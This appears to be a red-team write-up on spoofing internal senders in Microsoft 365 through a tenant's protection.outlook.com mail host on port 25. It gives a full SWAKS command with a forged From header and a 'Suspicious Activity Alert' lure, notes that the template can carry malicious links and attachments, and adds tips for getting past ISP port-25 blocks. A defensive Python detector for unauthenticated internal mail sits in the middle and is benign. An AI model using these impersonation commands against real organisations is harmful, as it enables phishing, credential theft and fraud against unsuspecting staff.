If a company is using M365, it is probable that this technique can be used to impersonate other trusted users from within the tenancy, or any M365 account from within the same region.
The company MX records may resolve to:
companyname-com-au.protection.outlook.com
If so, this server is likely advertising SMTP on the unencrypted port 25.
If they do not use such a server, you can still attempt this technique using any .protection.outlook.com domain from the same Azure region.
This will only work when sending to and from M365 accounts in the same region as the server used.
To send an email impersonating another user, we can use SWAKS.
Example command:
swaks --to [email protected] --from [email protected] --server victim-com-au.mail.protection.outlook.com --port 25 --header "X-Mailer: CustomMailer" --header "Message-Id: <20250319100737.1988881@Windows10>" --ehlo Windows10Corp --header "From: Sender Name <[email protected]>" --header "Subject: Suspicious Activity Alert" --attach-type text/html --attach-body @template.html
Template.html can be any email HTML template and can contain malicious links. You can also attach files.
If you want to add an attachment using SWAKS, you need to:
- Specify the file's MIME type with --attach-type
- Specify the file's name with --attach-name
- Specify the file with --attach
--attach-type text/plain --attach-name example.txt --attach @example.txt
The beauty of this technique is that Outlook trusts this service and treats the sender as verified. If sent internally, Microsoft will not display any warnings and will even display the sender's real profile image and info to the recipient.
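A defender-side check, added here as an example and not part of the original page or of any Microsoft tooling: it reads the Authentication-Results and X-MS-Exchange-Organization-AuthAs headers that Exchange Online stamps on delivered mail and flags messages whose From: claims a tenant domain but which did not pass SPF, DKIM and composite authentication, or were submitted anonymously. The tenant domain and both sample messages are constructed placeholders.

```python
import email
import email.utils
import re
from email import policy

# Tenant's own accepted domains; constructed placeholder, not taken from the page.
INTERNAL_DOMAINS = {"victim.com.au"}

def parse_auth_results(value: str) -> dict:
    """Reduce an Authentication-Results header to {'spf': 'fail', 'dkim': 'none', ...}."""
    return {m.group(1): m.group(2) for m in re.finditer(r"\b(spf|dkim|dmarc|compauth)=(\w+)", value)}

def from_domain(msg) -> str:
    """Lower-cased domain of the RFC 5322 From: address ('' if it cannot be parsed)."""
    addr = email.utils.parseaddr(str(msg.get("From", "")))[1]
    return addr.rsplit("@", 1)[1].lower() if "@" in addr else ""

def spoof_indicators(raw: bytes) -> list:
    """Reasons a message with an internal From: looks unauthenticated; [] when nothing is wrong."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    if from_domain(msg) not in INTERNAL_DOMAINS:
        return []  # external senders are covered by ordinary anti-spoofing, not this check
    auth = parse_auth_results(str(msg.get("Authentication-Results", "")))
    reasons = [f"{k}={auth.get(k, 'missing')}" for k in ("spf", "dkim", "compauth") if auth.get(k) != "pass"]
    # Exchange stamps unauthenticated SMTP submissions (such as direct send) as Anonymous.
    if str(msg.get("X-MS-Exchange-Organization-AuthAs", "")).strip().lower() == "anonymous":
        reasons.append("AuthAs=Anonymous")
    return reasons

# Constructed sample headers in the shape EOP stamps on delivery; not real messages.
SPOOFED = b"""Authentication-Results: spf=fail (sender IP is 203.0.113.5) smtp.mailfrom=victim.com.au; dkim=none (message not signed) header.d=none; dmarc=fail action=oreject header.from=victim.com.au; compauth=fail reason=000
X-MS-Exchange-Organization-AuthAs: Anonymous
From: Sender Name <ceo@victim.com.au>
To: staff@victim.com.au
Subject: Suspicious Activity Alert
"""
LEGIT = b"""Authentication-Results: spf=pass (sender IP is 198.51.100.7) smtp.mailfrom=victim.com.au; dkim=pass (signature was verified) header.d=victim.com.au; dmarc=pass action=none header.from=victim.com.au; compauth=pass reason=100
X-MS-Exchange-Organization-AuthAs: Internal
From: IT Desk <it@victim.com.au>
To: staff@victim.com.au
Subject: Patch window tonight
"""

if __name__ == "__main__":
    for name, raw in (("spoofed", SPOOFED), ("legit", LEGIT)):
        print(name, spoof_indicators(raw) or "no indicators")
```

Run it against exported message headers (or wire it into a transport-rule or SIEM pipeline) to surface intra-tenant mail that reached the mailbox without an authenticated submission.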
Real Life Example:
Things to note
- Some ISPs in Australia block outgoing traffic to port 25, so the server may appear to be down. If you connect through AWS or another VPN, port 25 should be accessible on these target servers.